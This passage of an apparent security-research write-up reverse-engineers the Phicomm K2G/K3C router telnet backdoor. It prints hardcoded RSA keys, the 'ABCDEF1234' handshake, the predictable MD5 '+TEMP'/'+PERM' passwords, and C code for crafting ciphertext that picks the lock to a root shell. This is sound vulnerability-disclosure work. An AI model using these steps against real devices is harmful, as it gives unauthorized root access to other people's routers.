After this exchange, a global variable at address 0x004147e0 is switched from its initial value of 2 to 0, and the main loop of the server enters another iteration. What we’re looking at, here, is a finite state machine, and the handshake token, "ABCDEF1234", is what sends it from the initial state into the second.

Second State

Control flow diagram of the next stage of the protocol, where the second message received from the client is “decrypted” using a hard-coded public RSA key, a random secret is generated, and then the “decrypted” message is XORed with the random secret, which is then used to generate ephemeral passwords by the set_telnet_enable_keys() function.

In the second state, shown above as a basic-block graph and below as decompiled C code, five important things happen after the client replies to the message containing the product-identifying hash:

S = ingest_token(payload_buffer,2);
if (S != 2) {
  memset(&PAYLOAD_00414af0,0,0x80);
  memcpy(&PAYLOAD_00414af0,payload_buffer,number_of_bytes_received);
  S = rsa_public_decrypt_payload();
  if (S != 0) break;
  CHECK_STATE_004147e0 = 1;
  generate_random_plaintext();
  rsa_encrypt_with_public_key();
  sendto(SKT,&ENCRYPTED_at_4149f0,0x80,0,&src_addr,addrlen);
  xor_decrypted_payload_with_plaintext();
  set_telnet_enable_keys();
  goto LAB_00401e1c;
}

1. Decryption of the client’s message with a public key

The reply, which is assumed to have been encrypted with the client’s private key, is then decrypted with a public RSA key that’s been hardcoded into the binary.

It’s unclear exactly what the designers of this algorithm expect the encrypted blob to contain, and indeed there’s nothing in what follows that would really constrain its contents in any way. This step to some extent resembles the authentication request stage of the SSH public key authentication protocol. This is where the client sends the server a request containing:

  1. the username,
  2. the public key to be used, and
  3. a signature

The signature is produced by first hashing a blob of data known to both parties (the username, for example, or session ID) and then encrypting that hash with the private key that corresponds to the public key sent (2). Something similar seems to be taking place at this stage of the Phicomm backdoor protocol, except that the content of the “signature” isn’t checked in any way. There’s no username, after all, for the client to provide, and just a single valid keypair in play, which is determined by the server’s own hardcoded public key. (Thanks to my colleague, Katie Sexton, for highlighting this resemblance and helping me make sense of this stage of the protocol.)

Control flow graph of the function that “decrypts” the client’s message using the hardcoded public RSA key.

Note the constant 3 passed to the OpenSSL library function, RSA_public_decrypt, which specifies that no padding is to be used. This will make our lives significantly easier in the near future.

int rsa_public_decrypt_payload(void)
{
  RSA *rsa;
  BIGNUM *a;
  int n;
  uint digest_len;
  size_t length_of_decrypted_payload;
  BIGNUM *local_18 [3];
  rsa = RSA_new();
  local_18[0] = BN_new();
  a = BN_new();
  BN_set_word(a,0x10001);
  BN_hex2bn(local_18, "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691");
  rsa->e = a;
  rsa->n = local_18[0];
  memset(&DECRYPTED_PAYLOAD_at_4149d0,0,0x20);
  n = RSA_size(rsa);
  digest_len = RSA_public_decrypt(n,
                                  &PAYLOAD_00414af0,
                                  &DECRYPTED_PAYLOAD_at_4149d0,
                                  rsa,
                                  RSA_NO_PADDING);
  if (digest_len < 0x101) {
    length_of_decrypted_payload = strlen(&DECRYPTED_PAYLOAD_at_4149d0);
    n = -(length_of_decrypted_payload < 0x101 ^ 1);
  }
  else {
    n = -1;
  }
  return n;
}

Bizarrely, telnetd_startup at no point compares the result of this “decryption” with anything. It seems to rest content so long as the decryption function doesn’t outright fail, or yield a buffer of more than 256 bytes in length – which I’m not quite sure is even possible in this context, barring an undetected bug.

The n-component of the public key is stored in the binary as a hexadecimal string, and can be easily retrieved with the strings tool. The e-component is the usual 0x10001.

$ strings -n 256 usr/bin/telnetd_startup       
E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691
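With n and e in hand, the unpadded "public decrypt" operation can be modelled in a few lines of Python, since raw RSA is just a modular exponentiation. This is a rough sketch under that assumption: the helper names are mine, OpenSSL's range checks on the input are not modelled, and the toy key pair used for the round trip is the usual textbook example, not anything belonging to Phicomm.

```python
# The n-component recovered with `strings`, and the usual public exponent.
N_HEX = (
    "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE3657884"
    "5C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE33681588"
    "24EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F68"
    "8D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691"
)
N = int(N_HEX, 16)
E = 0x10001


def raw_rsa(value: int, exponent: int, modulus: int) -> int:
    """Textbook (unpadded) RSA: a single modular exponentiation."""
    return pow(value, exponent, modulus)


def public_decrypt_no_padding(blob: bytes) -> bytes:
    """Rough model of an unpadded public-key 'decryption' with this key."""
    size = (N.bit_length() + 7) // 8
    return raw_rsa(int.from_bytes(blob, "big"), E, N).to_bytes(size, "big")


# Round trip with a toy textbook key pair (NOT Phicomm's key): n = 61 * 53.
toy_n, toy_e, toy_d = 3233, 17, 2753
signed = raw_rsa(65, toy_d, toy_n)      # "encrypt" with the private exponent
print(raw_rsa(signed, toy_e, toy_n))    # "decrypt" with the public exponent
print(N.bit_length())
```

The modulus is 1024 bits long, which matches the 0x80-byte buffers used for the payload and the encrypted secret.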

An interesting question to ask, here, might be this: what’s the point of this initial exchange? An initial handshake is sent to the router, the router sends back a 16-byte message that uniquely identifies the model, and the router then expects the client to reply with a message encrypted with a particular private key. Why the handshake ("ABCDEF1234")? Why the product-identifying hash? Why not begin the interaction with the signed or “privately encrypted” message? This protocol would make sense if the client, whoever that might be, is expected to be in possession of a database that associates each product-identifying hash it might receive with its own private RSA key. If this were to be the case, then we might be looking at a particular implementation of a general backdoor protocol.

2. A random secret is generated

A random secret consisting of exactly 31 printable ASCII characters is generated. That these characters are printable will turn out to be a helpful constraint.
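As a stand-in for the firmware's generator, here is a minimal Python sketch of a 31-character printable secret. The alphabet and the use of the secrets module are my assumptions; the binary's actual character set and random source are not reproduced here. Adding a NUL terminator brings the buffer to 32 (0x20) bytes, which would fit the 0x20-byte spacing between the buffers named in the decompiled code.

```python
import secrets
import string

SECRET_LEN = 31

# Assumption: "printable" means ASCII letters, digits and punctuation.
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def generate_secret(length: int = SECRET_LEN) -> bytes:
    """Return `length` random printable ASCII characters as bytes."""
    chars = (secrets.choice(ALPHABET) for _ in range(length))
    return "".join(chars).encode("ascii")


secret = generate_secret()
buffer = secret + b"\x00"  # C-string form, including the terminator
print(len(secret), len(buffer))
```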

Control-flow graph of the function that generates a random, 31-character secret.

3. The random secret is encrypted

The random secret is then encrypted using the hardcoded public RSA key, such that the only feasible way to decrypt it will be with the corresponding private key.

int rsa_encrypt_with_public_key(void)
{
  RSA *rsa;
  BIGNUM *a;
  int iVar1;
  BIGNUM *local_18 [3];
  rsa = RSA_new();
  local_18[0] = BN_new();
  a = BN_new();
  BN_set_word(a,0x10001);
  BN_hex2bn(local_18, "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691");
  rsa->e = a;
  rsa->n = local_18[0];
  memset(&ENCRYPTED_at_4149f0,0,0x80);
  iVar1 = RSA_size(rsa);
  iVar1 = RSA_public_encrypt(iVar1,
                             &RANDOMLY_GENERATED_PLAINTEXT_at_4149b0,
                             &ENCRYPTED_at_4149f0,
                             rsa,
                             3);
  return iVar1 >> 0x1f;
}

4. The random, plaintext secret is XORed with the client’s message

This seems like a particularly strange move to me, a needless twist of complexity that, far from improving the security of the system, will afford a means for completely undoing it. The “decrypted” message received from the client in step 1 of state 2 — “decrypted”, remember, with the public key — is bitwise-xored with the random secret.

Control-flow graph of the function that calculates the bitwise-XOR of the random secret and the result of “decrypting” the client’s second message.

void xor_decrypted_payload_with_plaintext(void)
{
  byte *pbVar1;
  byte *pbVar2;
  int i;
  byte *pbVar3;

  i = 0;
  do {
    pbVar1 = &DECRYPTED_PAYLOAD_at_4149d0 + i;
    pbVar2 = &RANDOMLY_GENERATED_PLAINTEXT_at_4149b0 + i;
    pbVar3 = &XORED_MSG_00414b80 + i;
    i = i + 1;
    *pbVar3 = *pbVar1 ^ *pbVar2;
  } while (i != 0x20);
  return;
}
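For comparison, the same loop reads as a one-liner in Python. This is just my transliteration of the decompiled function, with the 0x20-byte length taken from its loop bound and sample inputs chosen arbitrarily.

```python
def xor_buffers(decrypted: bytes, secret: bytes, length: int = 0x20) -> bytes:
    """Byte-wise XOR of the first `length` bytes of two buffers."""
    if len(decrypted) < length or len(secret) < length:
        raise ValueError("both buffers must hold at least `length` bytes")
    return bytes(d ^ s for d, s in zip(decrypted[:length], secret[:length]))


# Arbitrary sample inputs: 0x41 ('A') XOR 0x20 flips the case bit to 0x61 ('a').
a = bytes([0x41]) * 0x20
b = bytes([0x20]) * 0x20
mixed = xor_buffers(a, b)
print(mixed)
print(xor_buffers(mixed, b) == a)  # XOR with the same buffer undoes itself
```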

5. The resulting string is used to construct ephemeral passwords

Here’s where things truly break down. The string produced by XORing the random plaintext secret with the client’s “decrypted” message is concatenated with two hardcoded salts: "+PERM" and "+TEMP". The resulting concatenations are then hashed with the same MD5 algorithm used earlier to produce the product identifier. The resulting 16-byte hashes are then set as the ephemeral passwords that, if correctly guessed, will allow the client to unlock the backdoor.

int set_telnet_enable_keys(void)
{
  size_t xor_str_len;
  char xor_str_perm [512];
  char xor_str_temp [512];
  uint md5 [22];

  sprintf(xor_str_perm,"%s+PERM",&XORED_MSG_00414b80);
  sprintf(xor_str_temp,"%s+TEMP",&XORED_MSG_00414b80);
  memset(md5,0,0x58);
  md5_init(md5);
  xor_str_len = strlen(xor_str_perm);
  md5_add(md5,xor_str_perm,xor_str_len);
  md5_digest(md5,&TELNET_ENABLE_PERM_at_414c20);
  md5_init(md5);
  xor_str_len = strlen(xor_str_temp);
  md5_add(md5,xor_str_temp,xor_str_len);
  md5_digest(md5,&TELNET_ENABLE_TEMP_at_0x414c30);
  return 0;
}

Can you see the problem here? Think it over. We’ll come back to this in a minute.

Verifying things in GDB

Once I had a general idea of how all the pieces fit together, I wanted to test my understanding of things by pushing a static MIPS build of gdbserver to the router, and then stepping through the telnetd_startup state machine with gdb-multiarch and my favourite gdb extension library, gef.

As I understood it, it seemed that telnetd_startup was expecting me, the client, to decrypt its secret message using the private RSA key that corresponds to the public key coded into the binary. Since I did not, in fact, possess that key, and since OpenSSL’s RSA implementation seemed like a tough nut to crack, I figured that I could verify my conjectures by simply cheating. I learned that if I just used the debugger to grab the random plaintext secret from the buffer at address 0x004149b0, salted it with the suffix "+TEMP", MD5-hashed it, and sent back the result, then I was in fact able to drive the state machine to its final destination, where system("telnetd -l /bin/login.sh") is called and the backdoor is thrown wide open. So long as I chose, for my second message, a string that I knew would be “decrypted” into a buffer of null bytes by the hardcoded public RSA key (and this is rather easy to do), I knew that this method would produce the correct ephemeral password. This gave me a pretty good indication of what we need to do in order to open the backdoor without the assistance of a debugger, and without peeking at memory that, in a realistic scenario, an attacker would have no means of seeing.

Screenshot of a debugger session (gdb-multiarch + gef), a python REPL, and a telnet session that shows how by reading the random secret directly from memory we can calculate the ephemeral password needed to initialize a telnet session. The client’s second message, in this scenario, is chosen so that the hardcoded public RSA key “decrypts” it to a buffer of null bytes.

What this proves is that all we need to do in order to open the backdoor is to either discover the private RSA key, or else guess the 31-character secret string. The odds of guessing a random string at that length are abysmal, and so, armed with the public RSA key, I focussed, at first, on rummaging around the internet for some trace of that key (in various formats) in hopes that I might find the complete key pair just lying around. A long shot, sure, but worth checking. It did not, however, pay off.

At this point I still hadn’t quite noticed the critical loophole that I mentioned earlier. It came while I was patiently sketching out the protocol diagram, shown below.

The Backdoor Protocol

Here is a complete protocol diagram of the Phicomm backdoor, as apparently intended to be used:

Picking the Backdoor’s Lock

Remember how I said, regarding step 5 of state 2, that things break down in the construction of the two ephemeral passwords? The first thing to observe here is how the XORed strings are concatenated with the two salts:

sprintf(xor_str_perm,"%s+PERM",&XORED_MSG_00414b80);
sprintf(xor_str_temp,"%s+TEMP",&XORED_MSG_00414b80);

We can expand XORED_MSG_00414b80 to make its construction a bit clearer, like so:

sprintf(xor_str_temp, 
"%s+TEMP",
xor(SECRET_PLAINTEXT,
RSA_public_decrypt(HARDCODED_PUBLIC_KEY,
ENCRYPTED_XOR_MASK)));
temp_password = MD5(xor_str_temp);

And mutatis mutandis for +PERM. Now, the format specifier %s as used by sprintf is not meant to handle just any byte arrays whatsoever. It’s meant to handle strings, and null-terminated strings, to be precise. The array of bytes at &XORED_MSG_00414b80 might, in the mind of the developer, be 31 bytes long, but in the eyes of sprintf() it ends where the first null byte occurs.

If the value of the first byte of that “string” is zero (i.e., '\x00', not the ASCII numeral '0'), then %s will format it as an empty string!
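
The truncation can be illustrated with a small Python sketch. It rests on two assumptions that should be read as such: `c_format_s` is a hypothetical helper that emulates how `%s` reads a buffer, and `hashlib.md5` stands in for the router's own md5_* routines, which are assumed here to compute standard MD5.

```python
import hashlib


def c_format_s(buf: bytes) -> bytes:
    """Emulate how C's %s reads a buffer: stop at the first null byte."""
    return buf.split(b"\x00", 1)[0]


def ephemeral_password(xored_msg: bytes, salt: bytes) -> bytes:
    """Mimic sprintf("%s" + salt) followed by MD5 over strlen() bytes."""
    formatted = c_format_s(xored_msg) + salt
    return hashlib.md5(formatted).digest()


# Two 32-byte buffers that share only a leading null byte. The other
# 31 bytes are never seen by %s, whatever they contain.
buf_a = b"\x00" + b"A" * 31
buf_b = b"\x00" + b"Z" * 31

assert c_format_s(buf_a) == b""
assert ephemeral_password(buf_a, b"+TEMP") == ephemeral_password(buf_b, b"+TEMP")
assert ephemeral_password(buf_a, b"+TEMP") == hashlib.md5(b"+TEMP").digest()
```

In this model, a leading null byte makes the hash depend on the salt alone, regardless of how much randomness sits behind it.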

If &XORED_MSG_00414b80 is treated as an empty string, then xor_str_temp and xor_str_perm are just going to be "+TEMP" and "+PERM". The random component is completely dropped! Their MD5 hashes will be entirely predictable. When that happens, this code

memset(md5,0,0x58);  
md5_init(md5);
xor_str_len = strlen(xor_str_perm);
md5_add(md5,xor_str_perm,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_PERM_at_414c20);
md5_init(md5);
xor_str_len = strlen(xor_str_temp);
md5_add(md5,xor_str_temp,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_TEMP_at_0x414c30);

will produce precisely these two hashes:

In [53]: salt = b"+TEMP" ; MD5.MD5Hash(salt + b'\x00' * (0x58 - len(salt))).digest().hex()
Out[53]: 'f73fbf2e90e43136f07279c745f2f9f2'
In [54]: salt = b"+PERM" ; MD5.MD5Hash(salt + b'\x00' * (0x58 - len(salt))).digest().hex()
Out[54]: 'c423a902bacd28bafd095350d66e7455'

What this means is that all we have to do to produce a situation where we can predict the two ephemeral passwords is to make it likely that

XORED_MSG_00414b80[0] == DECRYPTED_PAYLOAD_at_4149d0[0] ^ RANDOMLY_GENERATED_PLAINTEXT_at_4149b0[0] == '\x00'

This turns out to be easy.

In the absence of padding (i.e., when the padding variable is set to RSA_NO_PADDING (=3)), RSA_public_decrypt() will “successfully” transform the vast majority of 128-byte buffers into non-null buffers. Just to get a ballpark idea of the odds, here’s what I found when I used the hardcoded public RSA key provided to “decrypt” 1000 random buffers, in the Python REPL:

In [23]: D = [pub_decrypt(os.urandom(0x80), padding=None) for i in range(1000)]
In [24]: len([x for x in D if x and any(x)]) / len(D)
Out[24]: 0.903

Over 90% came back non-null. If the padding variable were set to RSA_PKCS1_PADDING, by contrast, we’d be entirely out of luck. Control of the plaintext would be virtually impossible:

In [85]: D = [pub_decrypt(os.urandom(0x80), padding="pkcs1") for x in range(1000)]
In [86]: len([x for x in D if x and any(x)]) / len(D)
Out[86]: 0.0

What this means is that so long as the server uses a padding-free cipher, we don’t actually need the private key in order to have some control over what RSA_public_decrypt() does with the message we send back to telnetd_startup at the beginning of State 2.
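
To make the padding-free point concrete, here is a sketch of what an unpadded RSA public-key operation amounts to: plain modular exponentiation. The name `raw_public_op` is hypothetical, and the toy key (n = 3233, e = 17, d = 2753) is the usual textbook example, not anything taken from the router. One plausible reason that roughly one random buffer in ten fails in the experiment above: the hardcoded modulus begins with the byte 0xE5, so about 10% of random 128-byte values are numerically at least as large as the modulus, and those get rejected.

```python
from typing import Optional


def raw_public_op(ciphertext: bytes, n: int, e: int) -> Optional[bytes]:
    """Unpadded RSA public-key operation: c^e mod n.

    Returns None when the input, read as a big-endian integer, is not
    smaller than the modulus (mirroring a "data too large" failure).
    """
    c = int.from_bytes(ciphertext, "big")
    if c >= n:
        return None
    size = (n.bit_length() + 7) // 8
    return pow(c, e, n).to_bytes(size, "big")


# Textbook toy key, NOT the router's key: n = 61 * 53.
N, E, D = 3233, 17, 2753

# Whoever holds the private exponent can prepare a message that the
# public key "decrypts" to a chosen value...
chosen = 65
prepared = pow(chosen, D, N).to_bytes(2, "big")
assert raw_public_op(prepared, N, E) == chosen.to_bytes(2, "big")

# ...but with no padding to check, every other input below the modulus
# is accepted too, and maps to *some* output without any private key.
assert raw_public_op((1234).to_bytes(2, "big"), N, E) is not None
assert raw_public_op((4000).to_bytes(2, "big"), N, E) is None
```

With a padded scheme, the output would additionally have to parse as a well-formed padding block, which random inputs essentially never do.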

So, what kind of control are we after here? Simple: we want the first byte of the “decrypted” buffer to be printable. Why? Because the one thing we know about the random plaintext secret is that it’s composed of printable bytes, that is, bytes that fall somewhere between 0x21 and 0x7e, inclusive.

In [25]: len([x for x in D if (0x21 <= x[0]) and (x[0] < 0x7f)]) / len(D)
Out[25]: 0.372

So that winds up being true of about 37% of random 128-byte buffers.
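
That figure is about what one would expect if the leading byte of the output behaved like a uniformly random byte. A quick check of the arithmetic, under that assumption:

```python
PRINTABLE_LOW, PRINTABLE_HIGH = 0x21, 0x7E  # inclusive range from the text

# Number of byte values in the printable range, out of 256 possible values.
printable_values = PRINTABLE_HIGH - PRINTABLE_LOW + 1
fraction = printable_values / 256

print(printable_values)    # 94
print(round(fraction, 3))  # 0.367
```

The measured 0.372 over 1000 samples sits comfortably within sampling noise of that estimate.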

Here’s a bit of C code that will whip up some phony ciphertext, meeting these fairly broad specifications.

unsigned char *find_phony_ciphertext(RSA *rsa) {
    unsigned char *phony_ciphertext;
    unsigned char phony_plaintext[1024];
    int plaintext_length;

    memset(phony_plaintext, 0, 0x20);
    phony_ciphertext = calloc(PHONY_CIPHERTEXT_LENGTH, sizeof(char));
    do {
        /* Try a fresh random candidate on every iteration. */
        random_buffer(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
        /* Make sure the leading byte of the candidate is never zero. */
        phony_ciphertext[0] || (phony_ciphertext[0] |= 1);
        plaintext_length = decrypt_with_pubkey(rsa,
                                               phony_ciphertext,
                                               phony_plaintext);

        /* Accept only if the "decrypted" buffer starts with a printable byte. */
        if ((plaintext_length < 0x101) &&
            (0x21 <= phony_plaintext[0]) &&
            (phony_plaintext[0] < 0x7f)) {
            printf("[!] Found stage 2 payload:\n");
            hexdump(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
            printf("[=] Decrypts to (%d bytes):\n", plaintext_length);
            hexdump(phony_plaintext, plaintext_length);
            return phony_ciphertext;
        }
    } while (1);
}

Once we’ve generated such a buffer, we then have a 1 in 94 (0x7f - 0x21) chance of having a message whose “decryption”, via the hardcoded RSA key, begins with the same character as the random secret plaintext. Those are astronomically better odds than trying to guess a 31-character string (94^-31) or a 16-byte hash (2^-128).

If we guess right, then the ephemeral password to temporarily enable telnetd will become MD5("+TEMP"), and the ephemeral password to permanently enable it will become MD5("+PERM").

And in this fashion we can gain an unauthenticated root shell on the Phicomm router after somewhere in the ballpark of one hundred guesses.
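
The "ballpark of one hundred guesses" can be made a little more precise with a geometric-distribution estimate. This is a sketch under the assumption that every attempt is independent and succeeds with probability 1/94, which presumes the router draws a fresh secret for each attempt.

```python
P_HIT = 1 / 94  # chance that the first bytes collide on a single attempt


def success_within(attempts: int, p: float = P_HIT) -> float:
    """Probability of at least one success in `attempts` independent tries."""
    return 1 - (1 - p) ** attempts


# Mean number of attempts until the first success (geometric distribution).
expected_attempts = 1 / P_HIT

for k in (50, 94, 200, 500):
    print(k, round(success_within(k), 3))
```

On these assumptions the expected number of attempts is 94, and the chance of having succeeded within the first 94 attempts is roughly 63%.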

Protocol Diagram Showing How the Backdoor Lock can be Picked

Proof of concept

To bring these findings together, I wrote a small proof-of-concept program in C that will reliably pick the lock on the Phicomm router’s backdoor and grant the user a root shell over telnet. You can see it in action below.

A screencast showing our exploit in action, successfully picking the lock on the Phicomm K2G router’s backdoor.

Picking the Lock on the K3C’s Backdoor

An advertisement for the Phicomm K3C, which sports an essentially identical backdoor.

I was curious whether Phicomm’s flagship router, the K3C, might implement the same backdoor protocol, and, if so, whether it might be vulnerable to an identical attack. These devices are still available through Phicomm’s Amazon storefront, for less than $30. So I put in an order for the device, and while I waited, set about scouring a few Chinese forums for surviving copies of the K3C’s firmware image. I was in luck! I was able to obtain firmware images for the K3C, in each of the following versions:

  • 32.1.15.93
  • 32.1.22.113
  • 32.1.26.175
  • 32.1.45.267
  • 32.1.46.268
$ find . -path "*usr/bin/telnetd_startup" -exec bash -c 'echo -e "$(grep -o "fw_ver .*" $(dirname {})/../../etc/config/system)\n\tMD5 HASH OF BINARY: $(md5sum {})\n\tPRODUCT IDENTIFIER: $(strings {} | grep VER)\n\tPUBLIC RSA KEY(S): $(strings -n 256 {})\n"' {} \;
fw_ver '32.1.15.93'
MD5 HASH OF BINARY: f53a60b140009d91b51e4f24e483e893 ./_K3C_V32.1.15.93.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
9FC8FFBF53AECF8461DEFB98D81486A5D2DEE341F377BA16FB1218FBAE23BB1F3766732F8D382E15543FC2980208D968E7AE1AC4B48F53719F6D9964E583A0B791150B9C0C354143AE285567D8C042240CA8D7A6446E49CCAF575ACC63C55BAC8CF5B6A77DEE0580E50C2BFEB62C06ACA49E0FD0831D1BB0CB72BC9B565313C9
fw_ver '32.1.22.113'
MD5 HASH OF BINARY: d23c3c27268e2d16c721f792f8226b1d ./_K3C_V32.1.22.113.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
fw_ver '32.1.26.175'
MD5 HASH OF BINARY: d23c3c27268e2d16c721f792f8226b1d ./_K3C_V32.1.26.175.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
fw_ver '32.1.45.267'
MD5 HASH OF BINARY: 283b65244c4eafe8252cb3b43780a847 ./_SW_K3C_703004761_V32.1.45.267.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER: K3C_INTELALL_VER_3.0
PUBLIC RSA KEY(S): E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C8349B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B6AE92815388B3E03
fw_ver '32.1.46.268'
MD5 HASH OF BINARY: 283b65244c4eafe8252cb3b43780a847 ./_K3C_V32.1.46.268.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER: K3C_INTELALL_VER_3.0
PUBLIC RSA KEY(S): E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C8349B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B6AE92815388B3E03

The older versions appeared to work differently, and in one of the writeups I dug up on Baidu, I found instructions for using a tool that sounded, at first, very much like mine in order to gain a root shell over telnet, so as to upgrade the firmware to the most recent version — something no longer facilitated by the official Phicomm firmware repository, which shut its doors when the company collapsed at the beginning of 2019.

A screenshot of Jack Cruise’s post (passed through Google Translate), showing how the RoutAckProV1B2.exe tool can be used to crack the backdoor implemented in an obsolescent version of the K3C firmware. This tool, unlike ours, cannot crack the backdoor protocol used on the most recent versions of Phicomm firmware for the K2G and K3C routers.

A quick look at RoutAckProV1B2.exe suggested that it did, indeed, interact with whatever runs on UDP port 21210 (0x52da in hexadecimal, da 52 in little-endian representation).
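
The port arithmetic is easy to double-check. A small Python sketch, using only the port number given in the text:

```python
import struct

PORT = 21210

# The port number in hexadecimal.
assert hex(PORT) == "0x52da"
# As a 16-bit constant stored little-endian, the way it would appear
# byte by byte in a hex dump.
assert struct.pack("<H", PORT) == b"\xda\x52"
# For comparison, network (big-endian) byte order.
assert struct.pack("!H", PORT) == b"\x52\xda"
```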

A hex dump of RoutAckProV1B2.exe, which hints that this tool, too, interacts with a service that listens on UDP port 21210 on the router.

I wondered if I’d been scooped, for a moment, and spun up a Windows VM on the isolated network to which the Phicomm K2G was connected. I downloaded the RoutAckProV1B2 tool, and monitored it with procmon.exe and Wireshark as it tried in vain to open the backdoor on the K2G. This tool wasn’t sending the handshake token, "ABCDEF1234".

A screenshot of the RoutAckProV1B2.exe tool running in a Windows VM, while being inspected by the Windows process monitor.

Instead it was sending a single 128-byte payload, five times in succession, before finally giving up.

This is the “magic packet” that the RoutAckProV1B2.exe tool uses to unlock the backdoor installed on older versions of Phicomm router firmware.
A closeup of the RoutAckProV1B2.exe tool, courtesy of Jack Cruise. The website www.right.com.cn is a Chinese-language forum for sharing technical information on a variety of routers.
Here we see the RoutAckProV1B2.exe tool unsuccessfully attempting to open the backdoor on a virtual machine running the most recent firmware I could find for the Phicomm K3C.

Versions 32.1.45 of the firmware and up, however, shared an identical build of the telnetd_startup daemon, which appeared to differ from its counterpart on the K2G router only in having been compiled to a big-endian MIPS instruction set, rather than the little-endian architecture found in the K2G. Surprisingly, this binary hadn’t been stripped of symbols, which made life just a little bit easier.

The function that set the ephemeral passwords (see above) suffered from the same programming mistake as its K2G counterpart, and was almost certainly built from the same source code.

A decompilation of the function I referred to above as “set_telnet_enable_keys()”, here seen in K3C’s build of the telnetd_startup binary. Here it’s compiled to a big-endian rather than little-endian MIPS architecture, and, unlike the K2G binary, has not been stripped of debugging symbols, which makes reverse engineering the binary somewhat easier. The algorithm is, nevertheless, identical.

All I’d need to do, then, was recover the hardcoded public RSA key from the binary and I could easily adapt my tool to pick the lock on this backdoor as well. Running strings -n 256 on the binary was all that it took.

Using strings -n 256 to grab the hardcoded public RSA key from the telnetd_startup binary in the K3C firmware (version 32.1.46.268).

strings also helped extract the product identifier. Where the Phicomm K2G build contained K2_COSTDOWN__VER_3.0, the K3C build had K3C_INTELALL_VER_3.0:

I used strings to grab the hardcoded product identifier from that binary, too.

I added this information to the table in the backdoor-lockpick tool, which associated product identifying strings with public RSA keys.

Adding the product identifier and hardcoded public RSA key to a lookup table used by my “backdoor lockpick” tool, enabling it to pick the lock on the K3C backdoor as well as the K2G one.

With a week to wait before my K3C arrived, I decided I’d make do with the tools at my disposal and emulate the K3C build of telnetd_startup in user mode with QEMU (wrapped, for the sake of portability and convenience, in a Docker container, following this method @drablyechos describes in this 2020 IOT Village talk at DEFCON, though the Docker wrapper isn’t strictly necessary).

The telnetd_startup daemon fails its preliminary search for the telnet flag in flash storage, since there’s no flash storage device to check, but it recovers from this failure gracefully and goes on to listen on UDP port 21210, just as it would if the telnet flag had been set to the disabled position in the flash device (which is, after all, the default setting).

The lockpick has no more trouble with this backdoor than it did with the one on the K2G.

A screencast showing my backdoor lockpick in action, again, this time picking the lock on the K3C’s backdoor. The K3C firmware, in this case, is being run on a virtual machine. The hardware was still in the mail.

For the sake of thoroughness, I decided to test RoutAckProV1B2.exe’s attack against my virtualized K3C, running firmware version 32.1.46.268.

Relying on Google Translate to read on-screen Chinese sometimes presents a challenge.

Google Translate doing its best to help me read the log messages on RoutAckProV1B2.exe’s GUI.

Not entirely sure of what was happening here, I decided I’d better check Wireshark again. RoutAckProV1B2 was repeatedly sending 128-byte packets to my virtualized K3C server (running firmware version 32.1.46.268) on UDP port 21210, but receiving no replies. At no point did a telnet port open.

When tested against the older firmware version 32.1.26.175, however, RoutAckProV1B2.exe worked like a charm.

